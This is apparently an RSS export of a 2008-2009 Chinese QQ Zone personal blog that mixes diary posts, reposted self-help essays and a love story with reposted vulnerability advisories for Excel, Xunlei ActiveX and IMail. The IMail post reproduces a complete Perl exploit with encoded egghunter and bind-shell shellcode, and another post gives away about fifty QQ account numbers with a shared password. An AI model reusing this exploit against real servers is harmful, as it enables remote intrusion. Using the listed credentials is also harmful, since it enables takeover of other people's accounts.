<?xml version="1.0" encoding="utf-8"?>
<?xml-stylesheet type="text/xsl" href="http://feeds.qzone.qq.com/rss.xsl" version="1.0"?>
<rss version="2.0" xmlns:qz="http://qzone.qq.com">
<channel>
<title><![CDATA[此QQ将消失]]></title>
<description><![CDATA[『Qzone俱樂部』Coldice]]></description>
<link>http://304993875.qzone.qq.com</link>
<lastBuildDate>Sat, 28 Nov 2009 12:47:12 GMT</lastBuildDate>
<generator>Qzone</generator>
<language>zh-cn</language>
<copyright>Copyright (C), 2005-2008, Tencent Tech. Co., Ltd.</copyright>
<pubDate>Sat, 22 Aug 2009 06:34:57 GMT</pubDate>

<item>
<title><![CDATA[[xfocus-SD-060314]Microsoft Office Excel 缓冲区溢出漏洞!]]></title>
<link>http://304993875.qzone.qq.com/blog/1250922897</link>
<description><![CDATA[受影响的软件及系统：<br>====================<br>Microsoft Office Excel 2000<br>Microsoft Office Excel XP<br>Microsoft Office Excel 2003<br><br>CVE: CVE-2006-0031<br><br>综述：<br>======<br><br>Microsoft Excel是Office产品套件中的电子表格和分析程序。<br><br>XFOCUS安全小组发现Excel在处理特定&quot;.xls&quot;文件时存在一个缓冲区溢出漏洞，这将导致Excel进程崩溃甚至执行任意代码。<br><br>分析：<br>======<br><br>Excel在打开&quot;.xls&quot;文件时会将一个缓冲区初始化为0x0e0e0e0e，这时Excel错误的使用了初始化的长度，导致一个基于栈的缓冲区溢出。<br><br>以下代码来自excel v9.0.0.8924 <br><br>&gt; <br>&gt; .text:3003FE0C                 movzx   eax, word ptr [ebx]<br>&gt; .text:3003FE0F                 xor     ecx, ecx<br>&gt; .text:3003FE11                 cmp     eax, 0Eh<br>&gt; .text:3003FE14                 mov     [ebp+var_8], ecx<br>&gt; .text:3003FE17                 jg      loc_301C01B5 <br>&gt; <br>&gt; .text:301C01B5                 mov     byte ptr [ebp+ecx+var_138], cl<br>&gt; .text:301C01BC                 inc     ecx<br>&gt; .text:301C01BD                 cmp     ecx, 0Eh<br>&gt; .text:301C01C0                 jle     short loc_301C01B5<br>&gt; .text:301C01C2                 cmp     ecx, eax<br>&gt; .text:301C01C4                 mov     [ebp-8], ecx<br>&gt; .text:301C01C7                 jg      loc_3003FFC9<br>&gt; .text:301C01CD                 sub     eax, ecx<br>&gt; .text:301C01CF                 lea     edi, [ebp+ecx+var_138]<br>&gt; .text:301C01D6                 inc     eax<br>&gt; .text:301C01D7                 mov     edx, eax<br>&gt; .text:301C01D9                 mov     eax, 0E0E0E0Eh<br>&gt; .text:301C01DE                 mov     ecx, edx<br>&gt; .text:301C01E0                 mov     esi, ecx<br>&gt; .text:301C01E2                 shr     ecx, 2<br>&gt; .text:301C01E5                 rep stosd  &lt;== buffer overflow<br> <!--v:3.2--> ]]></description>
<category><![CDATA[溢出漏洞]]></category>
<author><![CDATA[304993875@qq.com(此QQ将消失)]]></author>
<comments>http://304993875.qzone.qq.com/blog/1250922897#comment</comments>
<qz:effect>134218240</qz:effect>
<pubDate>Sat, 22 Aug 2009 06:34:57 GMT</pubDate>
<guid>http://304993875.qzone.qq.com/blog/1250922897</guid>
</item>

<item>
<title><![CDATA[[转]小本钱创业赚大钱的不二法门]]></title>
<link>http://304993875.qzone.qq.com/blog/1244349277</link>
<description><![CDATA[　　小本创业，许多情况不能大手大脚，要精打细算。<br>　　1、首先要做自己熟悉的事情<br>　　这点非常重要，任何项目任何行业都不是三天两天可以摸透的，不要把一个行业想得太简单，相关的行业经验非常重要，如果你对某个领域不熟悉，无论别人赚多少钱都不要去跟风，你跟风可能就是做别人的垫脚石。<br>　　2、客观评价自己<br>　　不要一味的觉得自己真的很能干，似乎什么东西自己都清楚，其实一个人的优势和特长是有限的，并且常常被自己欺骗，你要客观评价自己，就要主要让你的朋友亲人告诉你你性格外向还是内向？是否吃苦？是否放得下面子？是否有良好的表达能力？是否有良好的心理承受力？是否适合独立做事？适合有依赖性？是否是个乐观的人？是否有很强的自控力？等等。只有把这些调查清楚了，才明白自己是个什么样的人。<br>　　3、不要做高新技术和市场不成熟的行业<br>　　这些行业往往看起来利润可观，实际上门槛也很高，小本创业没有资本支持难以坚持那么久等到成功。<br>　　4、最好不要合伙<br>　　小本创业千万不要合伙(亲人除外)，理论上讲团队精神也好，合作也好，都是听起来有道理，小本创业无须合作，最好是自己单独做，否则，你的很多精力都会花在业务之外的地方。这点听起来似乎是错的，但是实际操作过程中却是正确的。你情愿雇员工不要合伙。<br>　　5、非常强的执行力<br>　　创业点子及策划只是一个短暂的过程，之后就是毫无生趣的执行阶段，这个阶段根本不是你想象中的充满乐趣和挑战的事情，相反，都是非常烦琐的事情，需要坚持不泄的去做。<br>　　6、让你的亲人支持你<br>　　这点也很重要，创业其实不是你一个人的事情，是你一家人的事情，是你所有朋友圈的事情，因为你创业必将影响到他们的生活，如果他们不理解不支持你是孤掌难鸣。坚持不多久就会放弃。 <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[304993875@qq.com(此QQ将消失)]]></author>
<comments>http://304993875.qzone.qq.com/blog/1244349277#comment</comments>
<qz:effect>134218760</qz:effect>
<pubDate>Sun, 07 Jun 2009 04:34:37 GMT</pubDate>
<guid>http://304993875.qzone.qq.com/blog/1244349277</guid>
</item>

<item>
<title><![CDATA[感悟人生～～！]]></title>
<link>http://304993875.qzone.qq.com/blog/1243919498</link>
<description><![CDATA[人生道路坎坷，拥有自己的理想，而迟迟不能实现，使我现在过的很盲目，我就像一只趴在玻璃上的苍蝇，前方的路虽然很光明，我却始终找不到通往前方的路。我的人生道路在哪里？又该何去何从？ <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[304993875@qq.com(此QQ将消失)]]></author>
<comments>http://304993875.qzone.qq.com/blog/1243919498#comment</comments>
<qz:effect>134219264</qz:effect>
<pubDate>Tue, 02 Jun 2009 05:11:38 GMT</pubDate>
<guid>http://304993875.qzone.qq.com/blog/1243919498</guid>
</item>

<item>
<title><![CDATA[[转]富人和穷人的经典差异]]></title>
<link>http://304993875.qzone.qq.com/blog/1243335500</link>
<description><![CDATA[1.自我认知 　　 <br>    穷人：很少想到如何去赚钱和如何才能赚到钱，认为自己一辈子就该这样，不相信会有什么改变。 <br>　　富人：骨子里就深信自己生下来不是要做穷人，而是要做富人，他有强烈的赚钱意识，这已是他血液里的东西，他会想尽一切办法使自己致富。 <br>　　2.休闲 <br>　　穷人：在家看电视，为肥皂剧的剧情感动得痛哭流涕，还要仿照电视里的时尚打扮自己。 <br>　　富人：在外跑市场，即使打高尔夫球也不忘带着项目合同。 <br>　　3.交际圈子 <br>　　穷人：喜欢走穷亲戚，穷人的圈子大多是穷人，也排斥与富人交往，久而久之，心态成了穷人的心态，思维成了穷人的思维，做出来的事也就是穷人的模式。大家每天谈论着打折商品，交流着节约技巧，虽然有利于训练生存能力，但你的眼界也就渐渐囿于这样的琐事，而将雄心壮志消磨掉了。 <br>　　富人：最喜欢交那种对自己有帮助，能提升自己各种能力的朋友。不纯粹放任自己仅以个人喜好交朋友。 <br>　　4.学习 <br>　　穷人：学手艺。 <br>　　富人：学管理。 <br>　　5.时间　　 <br>    穷人：一个享受充裕时间的人不可能挣大钱，要想悠闲轻松就会失去更多挣钱的机会。穷人的时间不值钱的，有时甚至多余，不知道怎么打发，怎么混起来才不烦。如果你可以因为买一斤白菜多花了一毛钱而气恼不已，却不为虚度一天而心痛，这就是典型的穷人思维。 <br>　　富人：一个人无论以何种方式挣钱，也无论钱挣得是多是少，都必须经过时间的积淀。富人的玩也是一种工作方式，是有目的的。富人的闲，闲在身体，修身养性，以利再战，脑袋一刻也没有闲着；穷人的闲，闲在思想，他手脚都在忙，忙着去麻将桌上多摸几把。 <br>　　6.归属感 <br>　　穷人：是颗螺丝钉。穷人因为自身的卑微，缺少安全感，就迫切地希望自己从属并依赖于一个团体。于是他们以这个团体的标准为自己的标准，让自己的一切合乎规范，为团体的利益而工作，奔波，甚至迁徙。对于穷人来说，在一个著名的企业里稳定地工作几十年，由实习生一直干到高级主管，那简直是美妙得不能再美妙的理想了。 <br>　　富人：那些团体的领导者通常都是富人，他们总是一方面向穷人灌输：团结就是力量，如果你不从属于自己这个团体，你就什么都不是，一文不名。但另一方面，他们却从来没有停止过招兵买马，培养新人，以便随时可以把你替换。 <br>　　7.投资及对待财富 <br>　　穷人：经典观点就是少用就等于多赚。比如开一家面馆，收益率是100%，投入2万，一年就净赚2万，对穷人来说很不错了。穷人即使有钱，也舍不得拿出来，即使终于下定决心投资，也不愿冒风险，最终还是走不出那一步。穷人最津津乐道的就是鸡生蛋，蛋生鸡，一本万利……但是建筑在一只母鸡身上的希望，毕竟是那样脆弱。 <br>　　富人：富人的出发点是万本万利。同样的开面馆，富人们会想，一家面馆承载的资本只有2万，如果有1亿资金，岂不是要开5000家面馆？要一个一个管理好，大老板得操多少心，累白多少根头发呀？还不如投资宾馆，一个宾馆就足以消化全部的资本，哪怕收益率只有20%，一年下来也有2000万利润啊！ <br>　　8.激情 <br>　　能不能干成大事，首先要看有没有激情 <br>　　穷人：没有激情。他总是按部就班，很难出大错，也绝不会做最好。没有激情就无法兴奋，就不可能全心全意投入工作，大部分的穷人不能说没有激情，但他的激情总是消耗在太具体的事情上；上司表扬了，他会激动；商店打折了，他会激动；电视里破镜重圆了，他的眼泪一串一串往下流，穷人有的只是一种情绪。 <br>　　富人：“燕雀安知鸿鹄之志？”“王侯将相，宁有种乎？”有这样的激情，穷人终将不是穷人！激情是一种天性，是生命力的象征，有了激情，才有了灵感的火花，才有了鲜明的个性，才有了人际关系中的强烈感染力，也才有了解决问题的魅力和方法。 <br>　　9.自信 <br>    穷人：穷人的自信要通过武装到牙齿，要通过一身高级名牌的穿戴和豪华的配饰才能给他们带来更多的自信，穷人的自信往往不是发自内心和自然天成的。 <br>　　富人：李嘉诚在谈到他的经营秘诀时说：“其实也没什么特别的，光景好时，决不过分乐观；光景不好时，也不过度悲观”。其实就是一种富人特有的自信。自信才能不被外力所左右，自信才可能有正确的决定。 <br>　　10.习惯 <br>　　穷人：有个故事，一个富人送给穷人一头牛。穷人满怀希望开始奋斗。可牛要吃草，人要吃饭，日子很难。穷人于是把牛卖了，买了几只羊，吃了一只，剩下的来生小羊。可小羊迟迟没有生下来，日子又艰难了。穷人又把羊卖了，买成鸡。想让鸡生蛋赚钱为生，但是日子并没有改变，最后穷人把鸡也杀了，穷人的理想彻底崩溃了。这就是穷人的习惯。 <br>　　富人：据一个投资专家说，富人成功秘诀就是：没钱时，不管多困难，也不要动用投资和积蓄，压力使你找到赚钱的新方法，帮你还清账单。这是个好习惯。性格形成习惯，习惯决定成功。 <br>    11.上网络 <br>　　穷人：上网聊天。穷人聊天，一是穷人时间多，二是穷人的嘴天生就不能闲着。富人讲究荣辱不惊，温柔敦厚，那叫涵养，有涵养才能树大根深。穷人就顾不了那么多，成天受着别人的白眼，浑身沾满了鸡毛蒜皮，多少窝囊气啊，说说都不行？聊天有理！ <br>　　富人：上网找投资机会。富人上网，更多的是利用网络的低成本高效率，寻找更多的投资机会和项目，把便利运用到自己的生意中来。 <br>　　12.消费花钱 <br>　　穷人：买名牌是为了体验满足感，最喜欢试验刚出来的流行时尚产品，相信贵的必然是好的。 <br>　　富人：买名牌是为了节省挑选细节的时间，与消费品的售价相比，他们更在乎产品的质量，比如会买15元的纯棉T恤，也不会买昂贵的莱卡制品。 <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[304993875@qq.com(此QQ将消失)]]></author>
<comments>http://304993875.qzone.qq.com/blog/1243335500#comment</comments>
<qz:effect>1032</qz:effect>
<pubDate>Tue, 26 May 2009 10:58:20 GMT</pubDate>
<guid>http://304993875.qzone.qq.com/blog/1243335500</guid>
</item>

<item>
<title><![CDATA[一条未发出的短信..]]></title>
<link>http://304993875.qzone.qq.com/blog/1241001990</link>
<description><![CDATA[<span style="font-weight:bold"><wbr /><span style="font-weight:bold"><wbr /><span style="line-height:1.8em;">男孩和女孩是一对情侣，女孩喜欢感受下雨，男孩种是在下雨的时候为女孩撑着伞，伞的大半部分都是遮着女孩的，每次雨水都打湿着男孩的身子，他没说什么，只是默默看着女孩陶醉的脸。他觉得很幸福，女孩也觉得很幸福。 <br>有天，男孩和女孩去游玩，男孩挽着女孩的手，正路过一个建筑工地，女孩兴奋的跳着嘴里还在说着些什么。男孩很少说话只是默默的看着她开心自己也开心。正说着的时候突然从楼上落下一块不大不小的碎石，正朝女孩头上砸来，此时已经来不急了，男孩一把抱过女孩，女孩尖叫了声。他想用自己的身体挡着碎石，正当快着地的时候，男孩猛的翻了个身让自己身体朝下，结果只是女孩的手被碎石砸到，骨折了。 <br>女孩也才刚反应过来，痛的叫了出来，结果眼泪出来了，她想：古话‘夫妻本是同林鸟，大难临头各自飞’这句话果然没错。想着强忍着痛从男孩身上爬了起来。看也不看男孩一眼慢慢的跑了。 <br>此时男孩在背后呼唤着女孩的名字，声音颤抖，嘴唇已经发白。他拿出手机拨了女孩的号码，女孩没接，再拨还是没接。反复几次他放弃了。只是手指在手机上按着什么，这时候男孩身边的血慢慢的蔓延开，他手垂了下来手机趟在血泊中，再也没力气按下发送键。 <br><br><span style="color:black;line-height:1.8em;">如果不能正常播放,请下载  <wbr /><a href="http://pic.51.com/images/wmv.gif" target="_blank"><img style="border:0;" src="http://pic.51.com/images/wmv.gif" /></a><wbr /> <a href="http://www.microsoft.com/windows/windowsmedia/download/default.asp" target="_blank"><span style="color:#1068be;line-height:1.8em;">Windows Media Player</span><wbr /></a><wbr /></span><wbr />第二天，女孩得知男孩在医院抢救的消息，也顾不上生气就往医院跑。当她到医院的时候，医生已经宣布男孩抢救无效死亡了。原因是肺部失血过多。 <br>原来当男孩想用身子挡着碎石的时候猛的发现地上矗立着一根十几厘米的钢筋。就猛的翻个身。用尽全身的力气只让碎石砸到女孩的手。自己却让钢筋插进肺部。 <br>男孩的母亲把男孩的手机交到女孩手里，女还看着那还未发出去的短信：亲爱的，对不起我还是没能保护你，让你手受伤了……看到这里女孩再也忍不住了涌出眼眶，冲向到往男孩的天堂…… ．．．．．． </span><wbr /></span><wbr /></span><wbr /> <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[304993875@qq.com(此QQ将消失)]]></author>
<comments>http://304993875.qzone.qq.com/blog/1241001990#comment</comments>
<qz:effect>134218241</qz:effect>
<pubDate>Wed, 29 Apr 2009 10:46:30 GMT</pubDate>
<guid>http://304993875.qzone.qq.com/blog/1241001990</guid>
</item>

<item>
<title><![CDATA[写日记了！]]></title>
<link>http://304993875.qzone.qq.com/blog/1230108428</link>
<description><![CDATA[写日记了！写日记了！<br><img src="http://imgcache.qq.com/qzone/em/e144.gif"><wbr /><br> <br>这个算日记吗？ 郁闷中不知道写什么了，HO HO 。。。。。<br>随便弄点，这就是随笔吧！！ <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[304993875@qq.com(此QQ将消失)]]></author>
<comments>http://304993875.qzone.qq.com/blog/1230108428#comment</comments>
<qz:effect>134218240</qz:effect>
<pubDate>Wed, 24 Dec 2008 08:47:08 GMT</pubDate>
<guid>http://304993875.qzone.qq.com/blog/1230108428</guid>
</item>

<item>
<title><![CDATA[CCTV被黑了！！！！]]></title>
<link>http://304993875.qzone.qq.com/blog/1228922850</link>
<description><![CDATA[<wbr /><a href="http://b23.photo.store.qq.com/http_imgload.cgi?/rurl4_b=602a100d8957e2de217f99e14559837fe75e4252a6d1028aece196e7ee1dfebc9fd3698124b9046f7cef2ce0d684ba2a3db1020fe649b91388521d9968110cde2501aa38da3b656c0c935e6f0ff3438e122c4687" target="_blank"><img style="width:376px;height:173px;border:0;" src="http://b23.photo.store.qq.com/http_imgload.cgi?/rurl4_b=602a100d8957e2de217f99e14559837fe75e4252a6d1028aece196e7ee1dfebc9fd3698124b9046f7cef2ce0d684ba2a3db1020fe649b91388521d9968110cde2501aa38da3b656c0c935e6f0ff3438e122c4687" /></a><wbr /><br><wbr /><a href="http://s13.photo.store.qq.com/http_imgload.cgi?/rurl4_b=e188d44c0f3a182f050c3228df4c28d1b6d4504e2a6e08c63eb489713868a6f7bbdc51c7f3975ffa7d463c8424634054f78b2ab97c663ca896b1497e8de950e3157acd1e8ef2c21a8fa36044f9d8deba7a69d3ef" target="_blank"><img style="border:0;" src="http://s13.photo.store.qq.com/http_imgload.cgi?/rurl4_b=e188d44c0f3a182f050c3228df4c28d1b6d4504e2a6e08c63eb489713868a6f7bbdc51c7f3975ffa7d463c8424634054f78b2ab97c663ca896b1497e8de950e3157acd1e8ef2c21a8fa36044f9d8deba7a69d3ef" /></a><wbr /><br>  CCTV也敢黑。真是佩服这孩子的胆量。。。（是胆量不是技术）<br><br>其实CCTV网站存在黑多漏洞，也有些黑客都进去过里面。<br><br>只是没有小波这孩子的胆量，还去改人家主页。这下出名了。。。<br><br>不过也要斜坡了，等着坐牢好了。。傻孩子。<img src="http://imgcache.qq.com/qzone/em/e128.gif"><wbr /><br><wbr /><a href="http://s3.photo.store.qq.com/http_imgload.cgi?/rurl4_b=602a100d8957e2de217f99e14559837f9b29cc1724211dd973b026f7e1edafed8200858aab809ab7f2cd5341ba3a40a41fc64dd87d83ab4747e4e803f32e58b60996745ef628576c965799b02b2157225bb09970" target="_blank"><img style="border:0;" src="http://s3.photo.store.qq.com/http_imgload.cgi?/rurl4_b=602a100d8957e2de217f99e14559837f9b29cc1724211dd973b026f7e1edafed8200858aab809ab7f2cd5341ba3a40a41fc64dd87d83ab4747e4e803f32e58b60996745ef628576c965799b02b2157225bb09970" /></a><wbr /><br>那孩子博客留言。。<br><br><br><br><br><br><br><br> <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[304993875@qq.com(此QQ将消失)]]></author>
<comments>http://304993875.qzone.qq.com/blog/1228922850#comment</comments>
<qz:effect>134218241</qz:effect>
<pubDate>Wed, 10 Dec 2008 15:27:30 GMT</pubDate>
<guid>http://304993875.qzone.qq.com/blog/1228922850</guid>
</item>

<item>
<title><![CDATA[送QQ刷人气！]]></title>
<link>http://304993875.qzone.qq.com/blog/1228834382</link>
<description><![CDATA[超多QQ刷人气，非送号~~！~~！！516356210----zhongshan          498068492----zhongshan<br>284335379----zhongshan<br>625063922----zhongshan<br>646581342----zhongshan<br>284337129----zhongshan<br>547023297----zhongshan<br>542638870----zhongshan<br>734035418----zhongshan<br>617333102----zhongshan<br>294216506----zhongshan<br>563979423----zhongshan<br>724781648----zhongshan<br>664865399----zhongshan<br>284786423----zhongshan<br>648443298----zhongshan<br>734131937----zhongshan<br>641091378----zhongshan<br>312530339----zhongshan<br>526153390----zhongshan<br>729958265----zhongshan<br>604996597----zhongshan<br>383590869----zhongshan<br>420431183----zhongshan<br>378649896----zhongshan<br>675155738----zhongshan<br>602026651----zhongshan<br>592932763----zhongshan<br>654816793----zhongshan<br>648874807----zhongshan<br>654816793----zhongshan<br>648874807----zhongshan<br>411836583----zhongshan<br>359658017----zhongshan<br>405274724----zhongshan<br>454230250----zhongshan<br>529174872----zhongshan<br>375997553----zhongshan<br>315501464----zhongshan<br>461436250----zhongshan<br>664671702----zhongshan<br>516914144----zhongshan<br>490654770----zhongshan<br>646200830----zhongshan<br>553907598----zhongshan<br>452507807----zhongshan<br>245164838----zhongshan<br>648874127----zhongshan<br>874134309----zhongshan<br>897621453----zhongshan <br>905492877----zhongshan <!--v:3.2--> ]]></description>
<category><![CDATA[个人日记]]></category>
<author><![CDATA[304993875@qq.com(此QQ将消失)]]></author>
<comments>http://304993875.qzone.qq.com/blog/1228834382#comment</comments>
<qz:effect>134218240</qz:effect>
<pubDate>Tue, 09 Dec 2008 14:53:02 GMT</pubDate>
<guid>http://304993875.qzone.qq.com/blog/1228834382</guid>
</item>

<item>
<title><![CDATA[IMail IMAP Service DELETE 命令溢出漏洞]]></title>
<link>http://304993875.qzone.qq.com/blog/1228834088</link>
<description><![CDATA[<span style="font-weight:bold"><wbr />受影响系统</span><wbr /> IMail Server 8.x<span style="font-weight:bold"><wbr />详细描述</span><wbr /><br>Muts 在 IMail Server 中发现一个安全漏洞, 能被恶意用户利用威胁到系统的安全。<br><br>这个漏洞的成因是由于IMAP service (&quot;IMAP4D32.exe&quot;) 在处理 &quot;DELETE&quot; 命令时没有进行边界检查. 如果用户提交&quot;DELETE&quot;命令时附带超长的参数，(约 300 字节) 将导致缓冲区溢出。<br><br>成功利用者可以执行任意代码。<br><br>这个风险在 IMAIL 8.13 版本中发现，其它版本可能也受影响。<br><br><span style="font-weight:bold"><wbr />测试代码</span><wbr /><br>#!/usr/bin/perl -w<br>###################################<br>#<br># IPSwitch-IMail-8.13-DELETE<br>#<br># Discovered by : Muts<br># Coded by : Zatlander<br># <a href="http://www.whitehat.co.il/" target="_blank">WWW.WHITEHAT.CO.IL</a><wbr /><br>#<br>##################################<br>#<br># Plain vanilla stack overflow in the DELETE command<br># Restrictions:<br>#   - Need valid authentication credentials<br>#   - Input buffer only allows characters between x20 -&gt; x7e<br>#<br># Credits:<br>#   - <a href="http://www.metasploit.org  -/" target="_blank">http://www.metasploit.org  -</a><wbr /> HD Moore for the metasploit shellcode<br>#   - <a href="http://www.edup.tudelft.nl/~bjwever/menu.html" target="_blank">http://www.edup.tudelft.nl/~bjwever/menu.html</a><wbr /> - skylined for the ALPHA ascii \<br>shellcode generator #   - <a href="http://www.hick.org/" target="_blank">http://www.hick.org</a><wbr /> - for the syscall egghunt code in the \<br>paper &quot;Understanding Windows Shellcode&quot; #<br>##################################<br><br>use IO::Socket;<br>use Getopt::Std;<br>use Mail::IMAPClient;<br><br>print &quot;Exploit for the IPSwitch IMail DELETE buffer overflow\n&quot;;<br>print &quot;C0d3d by Zatlander\n&quot;;<br>print &quot;Discovered by Muts\n&quot;;<br>print &quot;<a href="http://www.whitehat.co.il/" target="_blank">WWW.WHITEHAT.CO.IL</a><wbr />\n&quot;;<br>print &quot;For hacking purposes only!!!\n\n&quot;;<br><br># Find shellcode with signature &quot;w00tw00t&quot;; start from esp<br># from 0 -&gt; $egghunter = \<br>&quot;TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIVSyBUco0OKbWdp00ptH0uXqRnkHH2a3PL \<br>Mvtvqzm6NulfePabTiaxbycrb09Gjt5xkTySjeTsEzFmSo2eXyoKRA&quot;; $egghunter = \<br>&quot;TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJINkN44skpmkt7fPTpptx0UXpBLKkx1Q3PL \<br>MtT4QxMVN5lc5sQSDxqyrjSW2VYUJRUXkp9SjVdT5KVosKrWxioKRA&quot;;<br><br># Real shellcode: bind shell on port 4444 ( ./alpha edx &lt; shellcode.bin )<br>$shellcode = &quot;JJJJJJJJJJJJJJJJJ7RYjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLjH2vUP7puPQCQEV6aGn \<br>kbLWT28NkpEWLlKpT35QhgqKZlKPJvxLKQJWPuQXkKSdrSyLKgDLKuQJNVQ9okLP1KpLlP8kPBT7wyQXOVmvah \<br>GZKl25kSLwTGdqeKQlK2zUts1jKSVnktL0KNkaJWlUQxkLK7tnkUQM8zKgrVQYP1OqNQMQKkreXWpSnSZp03i1 \<br>tlKGilKSkvlLKQK5Lnk7kLKckTH0SSXLNpN6nJLKOJvK9IWK1ZLuPfawps0Rwv63cMYiuJHDguPuPS0Np7qWp7 \<br>pnV6ywhYwMttYt0Yym5QYK62inDvzd0Kwy4nMDniyXYUYkENMHKxmylgKpWPSVRSovS4ruPckLMpKupRqKOYGK \<br>9YOoyKsLMBUTTRJs7Ryv1RsYoTtNokOv534pYk9dDNnyrxrtkgWPTKOtwIoRutpfQkp2ppPrpF0spPPaPv09oR \<br>uFLniYWuaYKScpSe86bC07a3lmYIpSZVpRpQGyoruQ4QCF7kOv5thBsSdSgIoRuUpNiYWPhpCRmStwpoyXcLGy \<br>jDqIPnmQlQ4NLaz7e69zSlkNgJZosXlPTkvQT7TTP1TQvYWpDWTul5QUQLIcLTdRhK9SLQ4RlmY1letPPLMSt5 \<br>tFpqDrppQRqCaSqSa2iBqRqRspQKO45uPbH0rKNNS4VKOpU5TyoXPLIyvKO45S0QxnMN9fexNYov5S4oyHCbJK \<br>OKOTvkOzsyorU30BHl0MZfdaOkORu7tFQyKPSIo8PA&quot;;<br><br>getopts(&quot;h:u:p:&quot;, \%args);<br><br>if ((!defined $args{h}) || (!defined $args{u}) || (!defined $args{p})) {<br>   print &quot;Usage: $0 -h [host] -u [username] -p [password]\n&quot;;<br>   exit;}<br><br>$usr  = $args{u};<br>$pwd  = $args{p};<br>$host = $args{h};<br><br># jb +20; jnb +20  -&gt; jump over return address (0x21 is first ascii safe offset)<br>$jmp21 = &quot;r!s!&quot;;<br><br># 0x6921526A -&gt; pointer to &quot;CALL [EDX+8]&quot; ends up in return address<br>##########################################################################<br># This should hopefully be the only version dependent variable here.<br># Find an ASCII safe address pointing to a CALL [EDX+8] for your OS<br>##########################################################################<br>$calledx8 = &quot;jR!i&quot;;<br><br># aAA aligns ESP with the egghunter shellcode (popad, pop, pop)<br>$asciieh = &quot;aAA&quot; . $egghunter;<br>$asciisc = &quot;w00tw00t&quot; . $shellcode;<br>$email =<br>   &quot;From: \&quot;The guy hacking you\&quot; &lt;a\@b.com&gt;\r\n&quot; .<br>   &quot;To: \&quot;Poor You\&quot; &lt;b\@c.com&gt;\r\n&quot; .<br>   &quot;Subject: $asciisc\r\n&quot; .<br>   &quot;Date: Wed, 3 Nov 2004 14:45:11 +0100\r\n&quot; .<br>   &quot;Message-ID: &lt;000101c4c1acdcndj6d69b90$5e01a8c0\@snorlax&gt;\r\n&quot; .<br>   &quot;Content-Type: text/plain;\r\n\tcharset=\&quot;us-ascii\&quot;\r\n&quot; .<br>   &quot;Content-Transfer-Encoding: 7bit\r\n&quot; .<br>   &quot;\r\n&quot; .<br>   $asciisc;<br><br>$payload = &quot;A&quot; x 236 . $jmp21 x 3 . $calledx8 . &quot;S&quot; x 29 . $asciieh . &quot;\r\n&quot;;<br><br>print &quot;Login in to $host as $usr/$pwd\n&quot;;<br>my $imap = Mail::IMAPClient-&gt;new( Server =&gt; $host, User =&gt; $usr, Password=&gt; $pwd) or \<br>die &quot;Cannot connect: $@&quot;; print &quot;count: &quot; . $imap-&gt;message_count(&quot;Inbox&quot;) . &quot;\n&quot;;<br>print &quot;Sending EGG\n&quot;;<br>$imap-&gt;select(&quot;Inbox&quot;) or die &quot;Could not select: $@\n&quot;;<br>my $uid = $imap-&gt;append( &quot;Inbox&quot;, $email ) or die &quot;Cannot append: $@&quot;;<br>$msg =  $imap-&gt;message_string($uid) or die &quot;Cannot get message: $@&quot;;<br>#$msg =  $imap-&gt;body_string($uid) or die &quot;Cannot get message: $@&quot;; <br>#print &quot;retrieving $uid back: $msg\n&quot;;<br><br>print &quot;Overflowing DELETE\n&quot;;<br>$imap-&gt;delete($payload) or die &quot;Cannot delete: $@n&quot;;<br><br>print(&quot;Finished...\n&quot;);<br><br><span style="font-weight:bold"><wbr />解决方案</span><wbr /><br>限制使用或暂时停用Imail Server<br><br><span style="font-weight:bold"><wbr />相关信息</span><wbr /><br><a href="http://secunia.com/advisories/13200/" target="_blank">http://secunia.com/advisories/13200/</a><wbr /> <!--v:3.2--> ]]></description>
<category><![CDATA[溢出漏洞]]></category>
<author><![CDATA[304993875@qq.com(此QQ将消失)]]></author>
<comments>http://304993875.qzone.qq.com/blog/1228834088#comment</comments>
<qz:effect>134218240</qz:effect>
<pubDate>Tue, 09 Dec 2008 14:48:08 GMT</pubDate>
<guid>http://304993875.qzone.qq.com/blog/1228834088</guid>
</item>

<item>
<title><![CDATA[迅雷activex缓冲区溢出漏洞。]]></title>
<link>http://304993875.qzone.qq.com/blog/1228833983</link>
<description><![CDATA[迅雷ActiveX控件远程代码执行漏洞 <br><br>迅雷是一款在中国非常流行的基于P2SP技术的下载软件。更多详细信息请参考： <br><br>    <a href="http://www.xunlei.com/" target="_blank">http://www.xunlei.com</a><wbr /> <br><br>    在迅雷5的一个ActiveX控件中存在一个远程代码执行漏洞，远程攻击者可利用此漏洞在被攻击者系统上以当前浏览器权限执行任意代码，进而可安装木马以及间谍程序。 <br><br><br><br>Affected Software Versions: <br><br>    迅雷5(Version of &quot;DapCtrl*.dll&quot; &lt;= 1.5.578.28) <br><br><br><br>Details: <br>     <br>    漏洞存在于由ActiveX控件&quot;DapCtrl*.dll&quot;导出的&quot;Put()&quot;函数中，相关信息如下： <br><br>    InprocServer32:    C:\Documents and Settings\All Users\Application Data\Thunder Network\KanKan\DapCtrl1.5.578.28.483.dll <br>    ClassID      :     ACACC6EB-1FBA-4E13-A729-53AEB2DF54F8 <br><br>    [id(0x00000002)] <br>    long Put([in] BSTR name, [in] VARIANT value); <br><br><br>    如果把第一个参数name设置成某些特殊的object对象，将会导致可被利用的IE内存破坏，经过精心构造的多个破坏将导致IE运行到一个固定的地址，这个地址可利用IE中的javascript heap spray技术覆盖到，从而可稳定执行任意代码。 <br><br><br><br>Solution: <br><br>    厂商已在最新版本中修复了此漏洞，厂商公告可在如下地址找到： <br>     <br>    <a href="http://safe.xunlei.com/announce/xl08040501.html" target="_blank">http://safe.xunlei.com/announce/xl08040501.html</a><wbr /> <br><br><br><br>Disclosure Timeline: <!--v:3.2--> ]]></description>
<category><![CDATA[溢出漏洞]]></category>
<author><![CDATA[304993875@qq.com(此QQ将消失)]]></author>
<comments>http://304993875.qzone.qq.com/blog/1228833983#comment</comments>
<qz:effect>134218240</qz:effect>
<pubDate>Tue, 09 Dec 2008 14:46:23 GMT</pubDate>
